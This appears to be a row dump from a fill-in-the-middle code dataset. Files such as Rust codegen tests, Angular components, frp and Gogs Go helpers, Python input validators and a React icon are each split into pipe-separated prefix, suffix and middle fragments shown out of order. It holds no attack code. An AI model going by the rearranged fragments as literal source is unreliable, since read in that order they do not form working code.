assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn get_or_new_module() {
let mut scope = Scope::new();
assert!(scope.get_module("foo").is_none());
scope.get_or_new_module("foo").import("bar", "Bar");
scope
.get_or_new_module("foo")
.new_struct("Foo")
.field("bar", "Bar");
let expect = r#"
mod foo {
use bar::Bar;
struct Foo {
bar: Bar,
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn function_with_async() {
let mut scope = Scope::new();
let trt = scope.new_trait("Foo");
let f = trt.new_fn("pet_toby");
f.set_async(true);
f.line("println!(\"petting toby because he is a good boi\");");
let expect = r#"
trait Foo {
async fn pet_toby() {
println!("petting toby because he is a good boi");
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn trait_with_macros() {
let mut scope = Scope::new();
let trt = scope.new_trait("Foo");
trt.r#macro("#[async_trait]");
trt.r#macro("#[toby_is_cute]");
let f = trt.new_fn("pet_toby");
f.set_async(true);
f.line("println!(\"petting toby because he is a good boi\");");
let expect = r#"
#[async_trait]
#[toby_is_cute]
trait Foo {
async fn pet_toby() {
println!("petting toby because he is a good boi");
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn impl_with_macros() {
let mut scope = Scope::new();
scope.new_struct("Bar");
let imp = scope.new_impl("Bar");
imp.impl_trait("Foo");
imp.r#macro("#[async_trait]");
imp.r#macro("#[toby_is_cute]");
let f = imp.new_fn("pet_toby");
f.set_async(true);
f.line("println!(\"petting Toby many times because he is such a good boi\");");
let expect = r#"
struct Bar;
#[async_trait]
#[toby_is_cute]
impl Foo for Bar {
async fn pet_toby() {
println!("petting Toby many times because he is such a good boi");
}
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn struct_with_multiple_allow() {
let mut scope = Scope::new();
scope
.new_struct("Foo")
.allow("dead_code")
.allow("clippy::all")
.field("one", "u8")
.field("two", "u8");
let expect = r#"
#[allow(dead_code)]
#[allow(clippy::all)]
struct Foo {
one: u8,
two: u8,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
}
#[test]
fn enum_with_multiple_allow() {
let mut scope = Scope::new();
scope
.new_enum("IpAddrKind")
.allow("dead_code")
.allow("clippy::all")
.push_variant(Variant::new("V4"))
.push_variant(Variant::new("V6"));
let expect = r#"
#[allow(dead_code)]
#[allow(clippy::all)]
enum IpAddrKind {
V4,
V6,
}"#;
assert_eq!(scope.to_string(), &expect[1..]);
} | .field("one", "T")
.field("two", "U");
} |
category-list-item.component.ts | import {Component, ViewEncapsulation, ChangeDetectionStrategy, Input, Output, EventEmitter} from '@angular/core';
import {CategoryModalComponent} from '../../category-modal/category-modal.component';
import {Category} from '../../../../shared/models/Category';
import {CategoriesService} from '../../../shared/categories.service';
import {Router} from '@angular/router';
import {LocalStorage} from '@common/core/services/local-storage.service';
import {Modal} from '@common/core/ui/dialogs/modal.service';
import {ConfirmModalComponent} from '@common/core/ui/confirm-modal/confirm-modal.component';
@Component({
selector: 'category-list-item',
templateUrl: './category-list-item.component.html',
styleUrls: ['./category-list-item.component.scss'],
encapsulation: ViewEncapsulation.None,
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class | {
constructor(
private modal: Modal,
private api: CategoriesService,
private router: Router,
private storage: LocalStorage,
) {}
/**
* Help center category model instance.
*/
@Input() public category: Category;
/**
* Fired when this category model changes or is deleted.
*/
@Output() public onChange = new EventEmitter();
/**
* Show modal for creating child category.
*/
public openCreateChildCategoryModal() {
this.modal.show(CategoryModalComponent, {parentId: this.category.id})
.afterClosed().subscribe(() => this.onChange.emit());
}
/**
* Show modal for updating specified category.
*/
public openUpdateCategoryModal(category: Category) {
this.modal.show(CategoryModalComponent, {category})
.afterClosed().subscribe(() => this.onChange.emit());
}
/**
* Delete specified category if user confirms.
*/
public maybeDeleteCategory(id: number) {
this.modal.show(ConfirmModalComponent, {
title: 'Delete Category',
body: 'Are you sure you want to delete this category?',
bodyBold: 'Children of this category will not be deleted.',
ok: 'Delete'
}).afterClosed().subscribe(confirmed => {
if ( ! confirmed) return;
this.api.deleteCategory(id).subscribe(() => this.onChange.emit());
});
}
/**
* Detach specified category from parent if user confirms.
*/
public maybeDetachCategory(id: number) {
this.modal.show(ConfirmModalComponent, {
title: 'Detach Category',
body: 'Are you sure you want to detach this category from its parent?',
ok: 'Detach'
}).afterClosed().subscribe(confirmed => {
if ( ! confirmed) return;
this.api.detachCategory(id).subscribe(() => this.onChange.emit());
});
}
/**
* Select specified category and navigate to articles list route.
*/
public navigateToArticlesList(category: Category) {
const ids = [category.id];
if (category.parent_id) ids.push(category.parent_id);
this.storage.set('selectedCategories', ids);
this.router.navigate(['/help-center/manage/articles']);
}
}
| CategoryListItemComponent |
admin.go | // Copyright 2017 fatedier, [email protected]
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software |
package client
import (
"fmt"
"net"
"net/http"
"time"
"github.com/fatedier/frp/models/config"
frpNet "github.com/fatedier/frp/utils/net"
"github.com/julienschmidt/httprouter"
)
var (
httpServerReadTimeout = 10 * time.Second
httpServerWriteTimeout = 10 * time.Second
)
func (svr *Service) RunAdminServer(addr string, port int64) (err error) {
// URL router
router := httprouter.New()
user, passwd := config.ClientCommonCfg.AdminUser, config.ClientCommonCfg.AdminPwd
// API routes, see dashboard_api.go
router.GET("/api/reload", frpNet.HttprouterBasicAuth(svr.apiReload, user, passwd))
address := fmt.Sprintf("%s:%d", addr, port)
server := &http.Server{
Addr: address,
Handler: router,
ReadTimeout: httpServerReadTimeout,
WriteTimeout: httpServerWriteTimeout,
}
if address == "" {
address = ":http"
}
ln, err := net.Listen("tcp", address)
if err != nil {
return err
}
go server.Serve(ln)
return
} | // distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License. |
base.py | """
BASIC HELPER FUNCTIONS FOR THE PROGRAM
"""
from time import sleep
# Print a separator line of '=' characters
def linha(tam=40):
print(f"{'='*tam}")
# Read and validate a name
def ler | t):
stop = True
while stop:
stop = False
nome = input(txt).strip()
lista_nome = nome.split()
if len(lista_nome) == 0:
print("ERRO! Você digitou um nome vazio...")
sleep(1)
stop = True
else:
for valor in lista_nome:
# Check whether the name contains non-alphabetic content
if not valor.isalpha():
print("ERRO! Você digitou um nome inválido...")
sleep(1)
stop = True
nome = " ".join(lista_nome)
return nome
# Read and validate an integer
def ler_inteiro(txt=""):
# If the prompt text is empty, show a default message
if txt == "":
txt = "Digite o valor de um número inteiro"
while True:
try:
inteiro = int(input(txt))
except KeyboardInterrupt:
print("ERRO! Entrada de dados interrompida pelo usuário!")
inteiro = 0
break
except ValueError:
print("ERRO! Você digitou um valor inteiro inválido...")
sleep(1)
except Exception: # Any other error during input
print("ERRO! O programa teve um erro durante a leitura...")
sleep(1)
else:
break
return inteiro
# Read and validate an age
def ler_idade(txt):
if txt == "":
txt = "Digite o valor da idade"
while True:
idade = ler_inteiro(txt)
if idade < 0:
print("ERRO! Você digitou uma valor negativo...")
sleep(1)
else:
break
return idade | _nome(tx |
display_apps.py | import sqlite3
import os
def sql_connection():
"""
Establishes a connection to the SQL file database
:return: sqlite3 connection object
"""
path = os.path.abspath('PlaystoreDatabase.db')
con = sqlite3.connect(path)
return con
def sql_fetcher(con):
"""
Fetches all rows matching the given query from the database
:param con: open sqlite3 connection
:return: None; matching rows are printed to stdout
"""
query = input("\nEnter query to search: ")
count = 0
cur = con.cursor()
cur.execute('SELECT * FROM apps') # SQL search query
rows = cur.fetchall()
for r in rows:
if query in r:
count += 1
print(f'\nURL: {r[1]}\nNAME: {r[2]}\nRATING: {r[3]}\n'
f'REVIEWS: {r[4]}\nINSTALLS: {r[5]}\nVERSION: {r[6]}'
f'\nLASTUPDATE: {r[7]}\nCOMPANY: {r[8]}\nCONTACT: {r[9]}')
if count:
print(f'{count} posts fetched from database\n')
else:
print('\nNo posts stored for this query\n')
con = sql_connection()
while True:
sql_fetcher(con)
ans = input('\nPress (y) to continue or any other key to exit: ').lower()
if ans == 'y':
continue
else:
| print('\nExiting..\n')
break |
|
map_test.go | package stick
import (
"encoding/json"
"testing"
"github.com/stretchr/testify/assert"
"go.mongodb.org/mongo-driver/bson"
)
func TestMap(t *testing.T) {
type child struct {
Body string `json:"the-body"`
}
type parent struct {
Title string `json:"title"`
Data Map `json:"data"`
}
input := &parent{
Title: "foo",
Data: MustMap(child{Body: "body"}, JSON),
}
bytes1, err := json.Marshal(input)
assert.NoError(t, err)
assert.Equal(t, `{"title":"foo","data":{"the-body":"body"}}`, string(bytes1))
var output1 parent
err = json.Unmarshal(bytes1, &output1)
assert.NoError(t, err)
assert.Equal(t, parent{
Title: "foo",
Data: Map{
"the-body": "body",
},
}, output1)
var ch1 child
output1.Data.MustUnmarshal(&ch1, JSON)
assert.Equal(t, child{Body: "body"}, ch1)
bytes2, err := bson.Marshal(input)
assert.NoError(t, err)
var output2 parent
err = bson.Unmarshal(bytes2, &output2)
assert.NoError(t, err)
assert.Equal(t, parent{
Title: "foo",
Data: Map{
"the-body": "body",
},
}, output2)
var ch2 child
output2.Data.MustUnmarshal(&ch2, JSON)
assert.Equal(t, child{Body: "body"}, ch2)
}
func TestMapFlat(t *testing.T) | {
m := Map{
"foo": "bar",
"bar": Map{
"foo": "bar",
},
"baz": map[string]interface{}{
"foo": "bar",
},
}
assert.Equal(t, Map{
"foo": "bar",
"bar_foo": "bar",
"baz_foo": "bar",
}, m.Flat("_"))
} |
|
functions1.rs | // functions1.rs
// Make me compile! Scroll down for hints :)
fn main() {
call_me();
}
fn call_me() {
println!("Done!");
}
|
// This main function is calling a function that it expects to exist, but the
// function doesn't exist. It expects this function to have the name `call_me`.
// It expects this function to not take any arguments and not return a value.
// Sounds a lot like `main`, doesn't it? | |
repo_branch.go | // Copyright 2015 The Gogs Authors. All rights reserved.
// Use of this source code is governed by a MIT-style
// license that can be found in the LICENSE file.
package git
import (
"fmt"
"strings"
"github.com/mcuadros/go-version"
)
const BRANCH_PREFIX = "refs/heads/"
// IsReferenceExist returns true if the given reference exists in the repository.
func | (repoPath, name string) bool {
_, err := NewCommand("show-ref", "--verify", name).RunInDir(repoPath)
return err == nil
}
// IsBranchExist returns true if the given branch exists in the repository.
func IsBranchExist(repoPath, name string) bool {
return IsReferenceExist(repoPath, BRANCH_PREFIX+name)
}
func (repo *Repository) IsBranchExist(name string) bool {
return IsBranchExist(repo.Path, name)
}
// Branch represents a Git branch.
type Branch struct {
Name string
Path string
}
// GetHEADBranch returns the branch that HEAD currently points to.
func (repo *Repository) GetHEADBranch() (*Branch, error) {
stdout, err := NewCommand("symbolic-ref", "HEAD").RunInDir(repo.Path)
if err != nil {
return nil, err
}
stdout = strings.TrimSpace(stdout)
if !strings.HasPrefix(stdout, BRANCH_PREFIX) {
return nil, fmt.Errorf("invalid HEAD branch: %v", stdout)
}
return &Branch{
Name: stdout[len(BRANCH_PREFIX):],
Path: stdout,
}, nil
}
// SetDefaultBranch sets the default branch of the repository.
func (repo *Repository) SetDefaultBranch(name string) error {
if version.Compare(gitVersion, "1.7.10", "<") {
return ErrUnsupportedVersion{"1.7.10"}
}
_, err := NewCommand("symbolic-ref", "HEAD", BRANCH_PREFIX+name).RunInDir(repo.Path)
return err
}
// GetBranches returns all branches of the repository.
func (repo *Repository) GetBranches() ([]string, error) {
stdout, err := NewCommand("show-ref", "--heads").RunInDir(repo.Path)
if err != nil {
return nil, err
}
infos := strings.Split(stdout, "\n")
branches := make([]string, len(infos)-1)
for i, info := range infos[:len(infos)-1] {
fields := strings.Fields(info)
if len(fields) != 2 {
continue // NOTE: trust that git will not emit a malformed ref line.
}
branches[i] = strings.TrimPrefix(fields[1], BRANCH_PREFIX)
}
return branches, nil
}
// DeleteBranchOptions contains options used when deleting a branch.
type DeleteBranchOptions struct {
Force bool
}
// DeleteBranch deletes a branch by name from the repository.
func (repo *Repository) DeleteBranch(name string, opts DeleteBranchOptions) error {
cmd := NewCommand("branch", "-d")
if opts.Force {
cmd.AddArguments("-f")
}
cmd.AddArguments(name)
_, err := cmd.RunInDir(repo.Path)
return err
}
// AddRemote adds a new remote to the repository.
func (repo *Repository) AddRemote(name, url string, fetch bool) error {
cmd := NewCommand("remote", "add")
if fetch {
cmd.AddArguments("-f")
}
cmd.AddArguments(name, url)
_, err := cmd.RunInDir(repo.Path)
return err
}
// RemoveRemote removes a remote from the repository.
func (repo *Repository) RemoveRemote(name string) error {
_, err := NewCommand("remote", "remove", name).RunInDir(repo.Path)
return err
}
| IsReferenceExist |
Broken.js | import React from 'react'
import SvgIcon from '@material-ui/core/SvgIcon'
function | (props) {
return (
<SvgIcon {...props}>
<path d="M12.604 15.233l-3.5 3.44L11.473 21H5c-1.102 0-2-.9-2-2V5c0-1.1.899-2 2-2h6.05L9.105 4.914l3.5 3.44-3.5 3.44 3.5 3.44zM19 3c1.1 0 2 .9 2 2v14c0 1.1-.9 2-2 2h-4.675l-2.367-2.327 3.5-3.44-3.5-3.44 3.5-3.439-3.5-3.44L13.905 3H19z" />
</SvgIcon>
)
}
export { Broken }
| Broken |
order_item.go | package model
type OrderItem struct {
Id int64 `gorm:"column:id" json:"id"`
OrderId int64 `gorm:"column:order_id" json:"orderId"`
ProductId int64 `gorm:"column:product_id" json:"productId"`
ProductSkuId int64 `gorm:"column:product_sku_id" json:"productSkuId"` | Title string `gorm:"column:title" json:"title"`
Image string `gorm:"column:image" json:"image"`
}
func (OrderItem) TableName() string {
return "order_items"
} | Amount int64 `gorm:"column:amount" json:"amount"`
Price int64 `gorm:"column:price" json:"price"` |
datagrid.module.ts | /*!
* Copyright 2019 VMware, Inc.
* SPDX-License-Identifier: BSD-2-Clause
*/
import { CommonModule } from '@angular/common';
import { NgModule } from '@angular/core';
import { FormsModule, ReactiveFormsModule } from '@angular/forms';
import { RouterModule } from '@angular/router';
import { ClarityModule } from '@clr/angular';
import { I18nModule } from '@vcd/i18n';
import { VcdActionMenuModule } from '../action-menu/action-menu.module';
import { VcdActivityReporterModule } from '../common/activity-reporter/activity-reporter.module';
import { PipesModule } from '../common/pipes/pipes.module';
import { VcdFormModule } from '../form/form.module';
import { ShowClippedTextDirectiveModule } from '../lib/directives/show-clipped-text.directive.module';
import { DatagridComponent } from './datagrid.component';
import { VcdComponentRendererOutletModule } from './directives/component-renderer-outlet.module';
import { DatagridMultiSelectFilterComponent } from './filters/datagrid-multiselect-filter.component';
import { DatagridNumericFilterComponent } from './filters/datagrid-numeric-filter.component';
import { DatagridSelectFilterComponent } from './filters/datagrid-select-filter.component';
import { DatagridStringFilterComponent } from './filters/datagrid-string-filter.component';
import { FunctionRendererPipe } from './pipes/function-renderer.pipe';
import { BoldTextRendererComponent } from './renderers/bold-text-renderer.component';
const pipes = [FunctionRendererPipe];
const renderers = [BoldTextRendererComponent];
const filters = [
DatagridNumericFilterComponent,
DatagridStringFilterComponent,
DatagridSelectFilterComponent,
DatagridMultiSelectFilterComponent, | imports: [
CommonModule,
ClarityModule,
RouterModule,
PipesModule,
ReactiveFormsModule,
ShowClippedTextDirectiveModule,
FormsModule,
I18nModule,
VcdActivityReporterModule,
VcdFormModule,
VcdActionMenuModule,
VcdComponentRendererOutletModule,
],
declarations: [DatagridComponent, ...renderers, ...pipes, ...filters],
providers: [],
exports: [DatagridComponent, ...renderers],
entryComponents: [...renderers, ...filters],
})
export class VcdDatagridModule {} | ];
@NgModule({ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.